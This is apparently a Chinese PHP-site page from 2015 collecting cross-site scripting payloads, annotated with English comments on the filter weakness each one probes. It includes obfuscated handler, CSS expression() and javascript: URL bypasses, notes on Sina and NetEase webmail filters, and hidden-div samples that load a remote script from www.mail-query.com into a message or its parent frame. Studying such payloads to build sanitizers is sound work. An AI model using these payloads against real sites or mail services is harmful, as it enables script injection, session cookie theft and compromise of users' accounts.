来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
<!-- Baseline inline-script probes for an HTML filter; alert() is only a visible marker that
     the markup was executed rather than escaped. The first line ends with a second opening
     script tag instead of a closing one (possibly a typo), so it also exercises how the
     filter handles an unterminated script element. Output-encoding the angle brackets
     neutralises both. -->
<script>alert("dddd")<script>
<script>alert('test')</script>
----------------------------TOM-------------------------------------------------------------------
<!-- Numbered probes 52–66. Each line carries its number both in alert() and as trailing text,
     so a tester can see which input survived the filter. Nearly all of them depend on an
     event-handler attribute, which is why an attribute allowlist is more robust here than a
     blocklist of handler names. -->
<!-- 52: the handler name is nested inside itself; a filter that removes "onload" in a single
     pass without re-scanning leaves a valid handler behind. Note the stray closing quote
     after the src value on 52–54. -->
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 ononloadload="alert(52)">52
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 onload="alert(53)">53
<!-- 54, 56, 57: a comment-like token sits where a separator is expected; these check whether
     the filter's tokenizer and the browser agree on where an attribute starts. -->
<img src=http://up.2cto.com/2012/1218/20121218013340854.gif" width=0 height=0 /**/onload="alert(54)">54
<!-- 55: a script element placed inside the attribute value of a malformed tag. -->
<ba="<script>alert(55);</script>"55
<img/*****/src=# width=0 height=0 /***/onerror=alert(56)>56
<iframe/**/src=http://www.baidu.com>57</iframe>
<!-- 58–63: onreadystatechange on non-script elements. Presumably only legacy Internet
     Explorer fires it there (confirm against the browsers in scope); the value of these
     cases is catching filters that enumerate only the common handler names. -->
<img src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(58)>58
<image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(59)>59
<style onreadystatechange=alert(60)>60</style>
<xml onreadystatechange=alert(61)>xxxx</xml>61
<object type=image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(62)>62
<img type=image src=http://up.2cto.com/2012/1218/20121218013340146.gif onreadystatechange=alert(63)>63
<!-- 64–65: Internet Explorer's HTML+TIME behavior (#default#time2) attached through a style
     attribute, with onEnd / onBegin as the handlers. A sanitizer has to treat the style
     attribute as an active-content carrier, not as presentation only. -->
<P STYLE="behavior:url('#default#time2')" onEnd=alert(64)>64
<P STYLE="behavior:url('#default#time2')" onBegin=alert(65)>65
<!-- 66: a closing style tag appears inside what looks like a quoted attribute value. An HTML
     parser ends the style element's raw text at that point, so the second img is parsed as
     markup. This is a parser-differential case: the sanitizer must parse the way the
     browser does, or re-serialise from a real DOM. -->
<style><img src="</style><img src=x onerror=alert(66)//">66
----------------------------------------------------------------------------------------------
<!-- Obfuscated URL and CSS probes. The common theme is that the dangerous token is not
     present literally, so a filter has to normalise its input (decode escapes, drop embedded
     whitespace and newlines) before it matches anything. -->
<!-- The backslash sequences are CSS escapes that spell out a url(javascript:...) value for
     background-image. -->
<DIV STYLE="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0061\006C\0065\0072\0074\0028\002F\0078\0073\0073\002F\0029\0029">
<frameset onload=alert(1)>
<!-- Whitespace inside the scheme name of a javascript: URL. -->
<IMG SRC="jav ascript:alert('XSS-1');">
<!-- Stray quote characters after the tag name, followed by a script element. -->
<IMG """><SCRIPT>alert("XSS-2")</SCRIPT>">
<!-- A style attribute with CSS expression() on the closing tag of an unknown element.
     expression() is a legacy Internet Explorer feature; this one reads document.cookie,
     which is the reason session cookies should carry HttpOnly. -->
Hello,80sec </xss style="x:expression(alert(document.cookie))">
<!-- The next 29 lines are a single IMG tag whose javascript: URL is written one character
     per line; it tests whether line breaks are removed before the scheme is checked. -->
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
<!-- Plain forms of the same three ideas: event handler, javascript: URL in src, and
     expression() in a style attribute. -->
<img src=http://up.2cto.com/2012/1218/20121218013340989.gif onLoad=alert(/xss-3/);>
<img src="javascript:alert(/xss-4/)" width=100>
<img src="#" style="Xss:expression(alert(/xss-5/));">
<!-- Two style elements in which the CSS keyword "expression" is broken up by CSS comments,
     so a literal search for the keyword finds nothing. Neither rule has a closing brace
     before the end of its style element. A CSS-aware sanitizer has to strip comments before
     matching keywords, or refuse author-supplied style sheets altogether. The empty input
     and anchor elements exist only to give each selector something to match. -->
<style>
input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
</style>
<input type="text">
<style>
a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
</style>
<a></a>
<!-- Attribute-boundary probes against webmail filters. They use the marquee onstart handler
     and img onerror, and vary the quoting so that the filter and the browser may disagree
     about where an attribute value ends. -->
<marquee style="background-color:red" onstart="alert('monyer')" >asdf</marquee>
<!-- Same markup as it would look inside an escaped string (literal \n, \" and \/ sequences);
     checks filters that inspect the text before it is unescaped. -->
<div>\n<marquee style=\"BACKGROUND-COLOR:red;\" onstart="alert('monyer')"\n>asdf<\/marquee><\/div>
<!-- A tag opened inside an unquoted img src value, with the handler name repeated in the
     later variants. -->
<img src=<marquee style="background-color:red" onstart="alert('monyer')" onerror=alert(/XSS-6/)>></marquee>
<img src=<marquee style="background-color:red" onstart="alert('monyer')" onerror=onerror=alert(/XSS-7/)>><marquee>
<img src=<marquee style="background-color:red" onstart="alert(/"/") onerror=onerror=alert(/XSS-8/)>><marquee>
<!-- Author's note below, roughly: "on Sina this one is only one double quote short of
     closing". -->
这个新浪只差一个"闭合了
<img src="<marquee style="background-color:red" onstart="alert("(") onerror=onerror=alert(/XSS-9/)>><marquee>
<!-- Typographic quotes follow the src value here; they are not attribute delimiters in HTML. -->
<img src=" http://xss.jpg"“‘; onerror=alert('onerror=')>
<!-- Author's note below, roughly: "Sina does not allow this one to be added". -->
这个新浪不让加入
<img src=" http://xss.jpg" onerror=alert('onerror=')>
<img src=" http://xss.jpg" style=\"BACKGROUND-COLOR:red;\" onerror=alert('onerror=')>
<!-- expression() again, split by a CSS comment inside a style attribute. -->
<DIV style="xss:ex/*ss*/pression(alert('http://hi.baidu.com/ycosxhack'))"></DIV>
<!-- onerror with a src that cannot load; attribute order and value form vary. -->
<img src=" http://xss.jpg" onerror=alert('XSS-10')>
<IMG onerror="alert('XSS-11')" src=" http://xss.jpg">
<img src=http onerror=alert(/XSS-12/)>
<div style="background-color:red" onmouseenter="alert('monyer')">123456</div>
<!-- A complete message body rather than a single tag. The hidden div "nini" holds script
     text that would create a script element pointing at an external host
     (www.mail-query.com). The style / div / style sequence that follows wraps a
     comment-split expression() which evals that text; the window.xx flag makes it run only
     once. Treat the external URL as untrusted third-party content when this sample is
     stored or rendered. Relevant controls: reject expression() and eval sinks in the
     sanitizer, and restrict script sources with a Content-Security-Policy. -->
<HTML><HEAD>
</HEAD>
<BODY>
<P>参加</P>
<div id="nini" style="display:none">window.xx=2;var f=document.createElement('script');f.src='http://www.mail-query.com/test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)</div><style><!--a{font-size:14px;font-family:arial,verdana,sans-serif;</style><div>;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);</div><style>}--></style><a></a><img width="1" height="1" src="http://www.mail-query.com/test.js">
</BODY></HTML>
网易最新的xss
<!-- A script that assembles its target URL from five string fragments and passes it to
     window.open, so the complete URL never appears literally in the markup. Filters that
     match on full URLs or host names will not see it; the reliable control is to not let
     script elements through at all. -->
<script defer="defer">var a,b,c,d,e;a="http:";b="//";c="www";d=".baidu";e=".com";window.open(a+b+c+d+e,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500");</script>
---------
<!-- HTML+TIME variant. The hidden div "llyy" holds script text that appends a script element
     (src on the external host www.mail-query.com) to the parent document, guarded by a
     parent.window.x check. The t:animate element, using the HTML+TIME namespace declared on
     the HTML tag, sets innerhtml to an img whose onerror evals that text; backticks are used
     where attribute quotes would normally be. HTML+TIME is specific to legacy Internet
     Explorer. The use of parent.* suggests the message is expected to render inside a
     frame; confirm against the target application. -->
<div id="aaa" style="display:none"></div>
<div id="llyy" style="display:none">
if(parent.window.x!='1')
{
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www.mail-query.com/test.js';
parent.document.body.appendChild(script1);
}
</div>
<HTML XMLNS:t="urn:schemas-microsoft-com:time">
<div>1<t:animate style="behavior:url(#default#time2)" attributename=innerhtml values=<img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)>></div>
---------
<!-- Repeat of the preceding hidden-div sample. The page cuts it off before the closing brace
     and closing div, and the element that would trigger it is not shown, so this fragment
     is incomplete as listed. -->
<div id="aaa" style="display:none"></div>
<div id="llyy" style="display:none">
if(parent.window.x!='1')
{
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www.mail-query.com/test.js';
parent.document.body.appendChild(script1);
|